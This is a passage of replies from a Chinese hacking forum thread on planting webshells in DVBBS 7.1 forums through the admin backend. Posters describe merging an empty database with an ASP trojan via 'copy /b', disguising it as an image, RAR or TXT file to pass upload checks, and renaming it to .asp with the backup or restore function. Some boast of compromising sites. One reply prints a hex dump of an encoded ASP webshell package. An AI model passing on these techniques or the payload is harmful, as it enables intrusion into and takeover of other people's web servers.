‹‹ 上一主题 | 下一主题 ››
 70 123
发新话题
打印

[原创]dvbbs7.1 照样从后台得到webshell

苛嗳貓灬ル

晶莹剔透§烈日灼然

Rank: 1

帖子
10 
精华
0 
积分
16 
阅读权限
40 
性别
女 
来自
桂林 
在线时间
9 小时 
注册时间
2006-9-24 
最后登录
2006-10-3 
51楼 发表于 2006-9-24 23:44  只看该作者
[s:70] 蒽,的确是很不错的方法。
:)
不错...........  可我只能用恢复数据库的方法 [s:74]

TOP

寻寻

晶莹剔透§烈日灼然

Rank: 1

帖子
84 
精华
0 
积分
142 
阅读权限
40 
在线时间
97 小时 
注册时间
2006-7-25 
最后登录
2008-9-5 
52楼 发表于 2006-9-27 15:31  只看该作者
也上传成功了..备份也成功了..可是提示不支持该功能...怎么办???
zaizai.7blog.net/

TOP

cz1314

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
2 小时 
注册时间
2005-9-25 
最后登录
2008-7-5 
53楼 发表于 2007-1-4 05:10  只看该作者
我使用 楼主发的 数据库马 依然显示以下结果


文件类型不正确![ 重新上传 ]


费解啊!!哪位大哥指点下!

TOP

chenjingnan

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
13 
阅读权限
40 
性别
男 
在线时间
0 小时 
注册时间
2006-9-10 
最后登录
2007-9-5 
54楼 发表于 2007-1-11 21:35  只看该作者
我试过把一句话木马插入数据库再把数据库后缀改为.rar然后后面的工作都差不多,效果也许比用.jpg和.gif好

TOP

pixy

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
396 
精华
10 
积分
4279 
阅读权限
100 
性别
男 
来自
China 
在线时间
285 小时 
注册时间
2007-1-3 
最后登录
2008-10-3 
55楼 发表于 2007-1-11 22:51  只看该作者
不错 思路很好.

看了一下 动网做的更强了。

支持
与狼共舞!

TOP

流氓混混

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
30 
阅读权限
40 
性别
男 
在线时间
3 小时 
注册时间
2006-6-7 
最后登录
2008-7-28 
56楼 发表于 2007-1-22 21:01  只看该作者
引用:
引用第6楼a11yesno2005-04-11 00:38发表的:
动画看了,我现在在想一个问题,假如既检查了是否是gif又检查是否是mdb文件呢
一样有办法绕过,一般的论坛都开放了允许上传.TXT,所以我们可以把后缀改为.txt上传。

TOP

xiaohouzi331

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
29 
阅读权限
40 
性别
男 
在线时间
17 小时 
注册时间
2007-1-23 
最后登录
2007-10-19 
57楼 发表于 2007-1-23 18:14  只看该作者
郁闷啊!

为什么我遇到的是这样的情况!!

错误:文件类型不正确![ 重新上传 ]

TOP

xiaohouzi331

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
29 
阅读权限
40 
性别
男 
在线时间
17 小时 
注册时间
2007-1-23 
最后登录
2007-10-19 
58楼 发表于 2007-1-23 18:31  只看该作者
呵呵!
给大家个提示哦!
如果在备份数据库操作中无法成功的时候,可以去试试操作"恢复数据库"
把上传的插了MM的图片文件恢复成ASP文件,就可以连接咯!

TOP

corpse

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
5 小时 
注册时间
2006-3-14 
最后登录
2008-7-24 
59楼 发表于 2007-1-26 16:00  只看该作者
我见到了一个DVBBS7.1的论坛发表文章、头像、博客等处都无法上传数据库改成gif的文件,都通过了GIF文件头的过滤(小弟试过在数据库改名的GIF前加上GIF的文件头可以上传)。

有点头痛了!!!请各位帮忙还有什么好的办法得到webshell吗?

TOP

hackway

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
0 小时 
注册时间
2006-7-25 
最后登录
2007-1-26 
60楼 发表于 2007-1-26 16:03  只看该作者
喜欢忧伤
为什么你给我们的那个dvbbsToshell.gif文件我在SP1里管理员上传,他会提示,文件类型不正确?
解释一下QQ95234489

TOP

achillis

晶莹剔透§烈日灼然

Rank: 1

帖子
55 
精华
0 
积分
197 
阅读权限
40 
性别
男 
在线时间
12 小时 
注册时间
2006-9-10 
最后登录
2008-7-30 
61楼 发表于 2007-2-3 21:18  只看该作者
我常用的方法是:
新建一个数据库db1.mdb
还有C/S版的海阳

然后copy db1.mdb /b + server.asp /b pic.jpg

在发帖的地方上传这个假的图片然后到后台备份就拿到shell了。
学习中.......

TOP

樱花浪子

荣誉会员

Rank: 6Rank: 6Rank: 6

帖子
22 
精华
0 
积分
87 
阅读权限
100 
在线时间
55 小时 
注册时间
2006-6-17 
最后登录
2008-8-21 
62楼 发表于 2007-2-3 22:10  只看该作者
貌似用数据库合并工具一样的!!

TOP

xianr

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
性别
男 
在线时间
26 小时 
注册时间
2007-1-24 
最后登录
2007-2-12 
63楼 发表于 2007-2-4 18:34  只看该作者
引用:
引用第61楼achillis2007-02-03 21:18发表的:
我常用的方法是:
新建一个数据库db1.mdb
还有C/S版的海阳

然后copy db1.mdb /b + server.asp /b pic.jpg
.......
有二个动网后台到现在都没有拿下来,具体怎么操作能说说吗,给一个地址也行

TOP

xianr

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
16 
阅读权限
40 
性别
男 
在线时间
26 小时 
注册时间
2007-1-24 
最后登录
2007-2-12 
64楼 发表于 2007-2-5 16:53  只看该作者
终于拿下了,我是这样的,用一楼的附件,改成MDB格式的,后台也设置一下可以上传MDB文件的,然后上传,后台备份一下,就有了,然后传大马了 [s:39]  [s:39] ,我还有一个DZ4.0的后台,提不了权哦

TOP

kine

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
15 
阅读权限
40 
性别
男 
在线时间
3 小时 
注册时间
2006-7-27 
最后登录
2008-8-27 
65楼 发表于 2007-2-7 10:47  只看该作者
引用:
引用第3楼kevin19862005-04-10 22:13发表的:
copy /b 1.gif+2.asp 3.gif
如果单纯靠检验头部解决其实很麻烦....还不如限制后缀列..
copy 1.mdb/b+1.asp/b 2.rar

1.mdb是一个空数据库,而新动网则没有对RAR文件进行合法性检查.可以成功备份.

TOP

heiye

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
13 
阅读权限
40 
在线时间
7 小时 
注册时间
2006-9-15 
最后登录
2008-9-17 
66楼 发表于 2007-2-11 08:01  只看该作者
新版本的7.1.0这些办法都不行了!上传图片格式提示文件类型不正确![ 重新上传 ] ,改名成RAR或者其他格式,虽然上传成功,但是显示的不是绝对路径!哎!!1郁闷!!高手帮忙啊

TOP

luyue720

水神

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
性别
男 
在线时间
14 小时 
注册时间
2007-7-22 
最后登录
2008-9-4 
67楼 发表于 2007-9-1 14:09  只看该作者
我备份好了.asp也出来了 就是连接时出现
Microsoft VBScript 编译器错误 错误 '800a03ea'

语法错误

这怎么办啊

TOP

ntandtv

晶莹剔透§烈日灼然

Rank: 1

帖子
24 
精华
0 
积分
66 
阅读权限
40 
在线时间
170 小时 
注册时间
2007-3-22 
最后登录
2008-9-25 
68楼 发表于 2007-9-6 08:02  只看该作者
终于拿下了,我是这样的,用一楼的附件,改成MDB格式的,后台也设置一下可以上传MDB文件的,然后上传,后台备份一下,就有了,然后传大马了  ,我还有一个DZ4.0的后台,提不了权哦


后台在哪设置一下,可以上传mdb文件

TOP

baoyuxue

晶莹剔透§烈日灼然

Rank: 1

帖子
精华
0 
积分
阅读权限
40 
在线时间
0 小时 
注册时间
2007-10-13 
最后登录
2007-10-13 
69楼 发表于 2007-10-13 21:14  只看该作者
打不开啊!!!!

TOP

恶魔傻蛋

晶莹剔透§烈日灼然

Rank: 1

帖子
18 
精华
0 
积分
65 
阅读权限
40 
性别
男 
来自
南昌 
在线时间
48 小时 
注册时间
2007-9-15 
最后登录
2008-6-3 
70楼 发表于 2007-10-14 17:44  只看该作者
我想知道楼主的数据库里的内容是用的什么编码~
复制内容到剪贴板
代码:
151C1F00020000000300080014001700FFFFFFFFB0FC005061636B616765000105000002000000080000005061636B6167650000000000000000003E08000002005765627368656C6C2E67696600443A5C444F43554D457E315C41444D494E497E315CD7C0C3E65C7765627368656C6C2E676966000000030027000000443A5C444F43554D457E315C41444D494E497E315CD7C0C3E65C7765627368656C6C2E67696600D30700003C2540204C414E4755414745203D2056425363726970742E456E636F646520253E0A3C2523407E5E4441414141413D3D7E396B682C57284C7355722C76514D4141413D3D5E237E40253E0D0A3C2523407E5E4377414141413D3D7E396B682C30396C596D506D674D4141413D3D5E237E40253E0D0A3C2523407E5E4567414141413D3D7E396B682C57284C5A4B45094F7362566E505867594141413D3D5E237E40253E0D0A3C2523407E5E4667414141413D3D7E4B787E7F444D57442C447F6445732B7E787F364F7E3977634141413D3D5E237E40253E0D0A3C2523407E5E5141414141413D3D7E552B4F2C57284C7355722C7850552B2E5C7F44202F4D2B6C446E72284C2B314F634A556D4D6B3259725554526F6B5E6E3F482F4F6E737234256E315945232C5468594141413D3D5E237E40253E0D0A3C2523407E5E4B51414141413D3D7E62307E3A44623A604D2B243B2B6B59634A6B58575B616C593445232A4021402A72457E59342B09507167774141413D3D5E237E40253E0D0A3C2523407E5E4851414141413D3D7E364E43446C2C27504D2B243B2B6B59634A3158575B396C596D45232C6D776B4141413D3D5E237E40253E0D0A3C2523407E5E5167414141413D3D7E552B4F2C57284C5A4B45094F7362566E274B34256F5572523B2E2B6D592B3A6E6159776B5E2B63446E35212B645976452F48305B326D59744562424B2E457F622C6452634141413D3D5E237E40253E0D0A3C2523407E5E4767414141413D3D7E4B34253B57217859776B5E6E52714472597F50575B6D596C2C58516B4141413D3D5E237E40253E0D0A3C2523407E5E4541414141413D3D7E62307E7F444D50275A5044342B09503141514141413D3D5E237E40253E0D0A3C2523407E5E4F77414141413D3D7E4D2B646157092F2B63684D72597F504540213657554F2C6D575E47447B442B39402A646C372B2C3F3B6D5E6E6B2F5A40214A57570959402A452C66524D4141413D3D5E237E40253E0D0A3C2523407E5E4267414141413D3D7E7F56647F503651454141413D3D5E237E40253E0D0A3C2523407E5E5051414141413D3D7E4D2B646157092F2B63684D72597F504540213657554F2C6D575E47447B442B39402A6A6C372B2C6A553F3B5E312B642F6540217A3657554F402A4A504942514141413D3D5E237E40253E0D0A3C2523407E5E4341414141413D3D7E7F785B2C6B36505A67494141413D3D5E237E40253E0D0A3C2523407E5E4377414141413D3D7E7F442E636D5E2B6C4D5076674D4141413D3D5E237E40253E0D0A3C2523407E5E4341414141413D3D7E7F785B2C6B36505A67494141413D3D5E237E40253E0D0A3C2523407E5E4641414141413D3D7E4B34253B57217859776B5E6E523B56472F7F504B41634141413D3D5E237E40253E0D0A3C2523407E5E4767414141413D3D7E552B4F2C57284C5A4B45094F7362566E2767574F3462786F2C5A416B4141413D3D5E237E40253E0D0A3C2523407E5E4667414141413D3D7E552B4F2C57284C7355722C785067574F7462784C7E4177634141413D3D5E237E40253E0D0A3C2523407E5E4D51414141413D3D7E222B646157092F2B63684D72597F5045402136572E682C6C6D447257092742457E682B44744B4E7877476444402A45505278414141413D3D5E237E40253E0D0A3C2523407E5E5451414141413D3D7E222B646157092F2B63684D72597F5045B1A3B4E6CEC4BCFEB5C440213657554F2C6D575E47447B442B39402ABEF8B6D4C2B7BEB663B0FCC0A8CEC4BCFEC3FB29C8E7472927686E347761636C64772A6C40214A30475544402A4A7E74784D4141413D3D5E237E40253E0D0A3C2523407E5E5251414141413D3D7E222B646157092F2B637F4D72597F504540216278323B44505948322B7B592B584F7E786D3A7F276458575B616C4F742C416B3959347832205064722E2B782A5A402A72506568634141413D3D5E237E40253E0D0A3C2523407E5E4751414141413D3D7E222B646157092F2B637F4D72597F504540212844402A452C6567634141413D3D5E237E40253E0D0A3C2523407E5E4767414141413D3D7E222B646157092F2B63684D72597F5045B1BECEC4BCFEBEF8B6D4C2B7BEB64A2C5441594141413D3D5E237E40253E0D0A3C253D23407E5E4E77414141413D3D647F442D7F44633A6C61776D4F7476496E3B212B644F633F2B4D2D2B4D2E6C4D7243345E2B6B60453F2F5D266E507B672948414A62622C4D684D4141413D3D5E237E40253E0D0A3C2523407E5E4751414141413D3D7E222B646157092F2B63684D72597F504540212844402A452C6D67634141413D3D5E237E40253E0D0A3C2523407E5E4767414141413D3D7E222B646157092F2B63684D72597F5045CAE4C8EBC2EDB5C4C4DAC8DD2972506867594141413D3D5E237E40253E0D0A3C2523407E5E5577414141413D3D7E222B646157092F2B63684D72597F50454021442B614F6D442B6D7E786D3A2B7B5E7A30394E6D5943505E475E2F78255A7E444B686478382150417239593427322B402A402126442B58596C4D2B6D402A4A2C5368734141413D3D5E237E40253E0D0A3C2523407E5E4D51414141413D3D7E222B646157092F2B63684D72597F504540216278323B44505948322B7B2F45286872592C5C6D563B2B78B1A3B4E6402A72504978414141413D3D5E237E40253E0D0A3C2523407E5E4841414141413D3D7E222B646157092F2B63684D72597F504540214A30472E73402A4A2C7151674141413D3D5E237E40253E0D0A000001050000050000000D0000004D45544146494C45504943540068090000F0FAFFFFF400000008006809100500000100090000037600000002001C0000000000050000000B0200000000050000000C0230005A001C000000FB02F5FF00000000000090010000000100000000CBCECCE50029E177E9A7BD774000000059030A4A6676BE776F76BE772000C177040000002D01000005000000090200000000050000000102FFFFFF0005000000020101000000050000002E01060000000C00000021050C005765627368656C6C2E67696621002D001C000000FB021000070000000000BC02000000860102022253797374656D00000000300000000A0026008A0100000000FFFFFFFF74FC0600040000002D010100030000000000C6AD05FE
就是这个.看不懂哦..~
恳请指点qq:3890313

TOP

‹‹ 上一主题 | 下一主题 ››
 70 123
发新话题